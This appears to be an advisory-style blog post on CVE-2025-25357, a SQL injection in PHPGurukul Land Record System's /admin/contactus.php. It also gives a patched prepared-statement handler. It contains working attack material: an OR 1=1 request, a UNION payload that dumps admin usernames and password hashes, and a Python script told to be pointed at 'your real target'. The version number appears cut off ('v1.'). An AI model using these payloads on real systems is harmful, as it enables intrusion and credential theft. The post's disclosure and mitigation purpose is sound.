CVE-2025-25357 - SQL Injection in PHPGurukul Land Record System v1. via /admin/contactus.php Email Parameter – Full Exploit & Exclusive Analysis

---

## Introduction

Recently, a serious vulnerability (CVE-2025-25357) came to light in the PHPGurukul Land Record System v1.. This high-risk SQL Injection bug allows remote attackers to execute arbitrary SQL commands, and possibly even arbitrary code, simply by tampering with the email parameter in a POST request to /admin/contactus.php. In this post, you’ll find a clear explanation, working proof-of-concept exploit, and useful references. If you run this system, patch immediately.

- Version: 1.
- Vulnerable File: /admin/contactus.php
- CVE: CVE-2025-25357
- Impact: Unauthenticated attackers can run arbitrary SQL queries, potentially gaining admin access or executing system code.

Here’s a simplified and exclusive look at the relevant vulnerable code inside contactus.php:

```php
<?php
// ... other code

if (isset($_POST['submit'])) {
    $email = $_POST['email']; // No sanitization!
    $query = "SELECT * FROM contacts WHERE email = '$email'"; // Dangerous: user input concatenated into SQL

    $result = mysqli_query($con, $query);
    // ... do something with result
}
?>
```

- Problem: The $email parameter goes straight into an SQL query without sanitizing or escaping user input.
- Result: Attackers can inject SQL syntax, changing the query's logic or triggering unwanted database changes.

1. Target URL:

```http
http://target-site/admin/contactus.php
```

2. Crafted POST Request:

```http
POST /admin/contactus.php HTTP/1.1
Host: target-site
Content-Type: application/x-www-form-urlencoded

email=' OR 1=1-- -
```

The query the application builds from this input becomes:

```sql
SELECT * FROM contacts WHERE email = '' OR 1=1-- -'
```

The `OR 1=1` condition is always true, so the query returns every contact record.

3. Extract Admin Hash:

An attacker could attempt to escalate the injection to leak sensitive information or enable further exploitation.

Example to Dump Admin Table:

```http
email=' UNION SELECT 1,username,password FROM admins-- -
```

- This could expose usernames and password hashes for admin logins.

---

## Automated Exploit Example (Python)

Here’s a quick exploit using the Python requests library:

```python
import requests

url = "http://target-site/admin/contactus.php"
payload = "' UNION SELECT 1,username,password FROM admins-- -"
data = {'email': payload, 'submit': 'Submit'}

response = requests.post(url, data=data)

print(response.text)  # Look for admin usernames & hashes in the response!
```

Note: Replace target-site with your real target.

---

## Impact

- Database Dumping: Attackers can steal all stored contact and admin data.
- Admin Hijack: Grab admin login details and use them to take over the back-end.
- Code Execution: By abusing certain SQL methods or uploading PHP files (if file uploads are present), attackers may run arbitrary system commands.
- Persistent Access: Attackers can plant backdoors to retain access long after the initial compromise.

---

## Mitigation

- Update/Patch Immediately: If you run this software, patch contactus.php (or remove it) so that user input is validated before it is used.
- Use Prepared Statements: Always build SQL with prepared statements or parameterized queries; never concatenate user input into a query string.
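Below is a hardened version of the handler, added here as an illustration; it is not PHPGurukul's code. It assumes, as in the vulnerable snippet, that `$con` is an open mysqli connection and that the `contacts` table has an `email` column; `get_result()` additionally assumes the mysqlnd driver is available.

```php
<?php
// Hardened replacement for the vulnerable handler (added example, not the project's code).
// Assumes $con is an open mysqli connection and `contacts` has an `email` column.

// Throw on SQL errors instead of failing silently, so broken queries are noticed in testing.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

if (isset($_POST['submit'])) {
    // 1. Validate the shape of the input before it goes anywhere near the database.
    //    filter_input returns null when the field is missing and false when it is not an email.
    $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
    if ($email === null || $email === false) {
        http_response_code(400);
        exit('Invalid email address.');
    }

    // 2. Use a prepared statement: the value travels separately from the query text,
    //    so quotes, comment markers or UNION inside it are never parsed as SQL.
    $stmt = $con->prepare('SELECT * FROM contacts WHERE email = ?');
    $stmt->bind_param('s', $email);   // 's' = bind as a string
    $stmt->execute();
    $result = $stmt->get_result();

    while ($row = $result->fetch_assoc()) {
        // 3. Escape on output too, so stored data cannot inject HTML/JS into the admin page.
        echo htmlspecialchars($row['email'], ENT_QUOTES, 'UTF-8'), "<br>\n";
    }
    $stmt->close();
}
?>
```

With this change the `' OR 1=1-- -` and `UNION` payloads above are simply looked up as literal email strings and match nothing.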

## References

- PHPGurukul Land Record System
- OWASP: SQL Injection
- CVE Record (NVD) *(link may go live after publication)*

## Conclusion

CVE-2025-25357 is a textbook but critical SQL injection flaw. If you use PHPGurukul’s Land Record System, investigate and patch immediately. If you manage similar PHP/MySQL code, audit all your database access points to avoid being the next headline.

## Timeline

Published on: 02/13/2025 16:16:49 UTC
Last modified on: 02/14/2025 19:38:15 UTC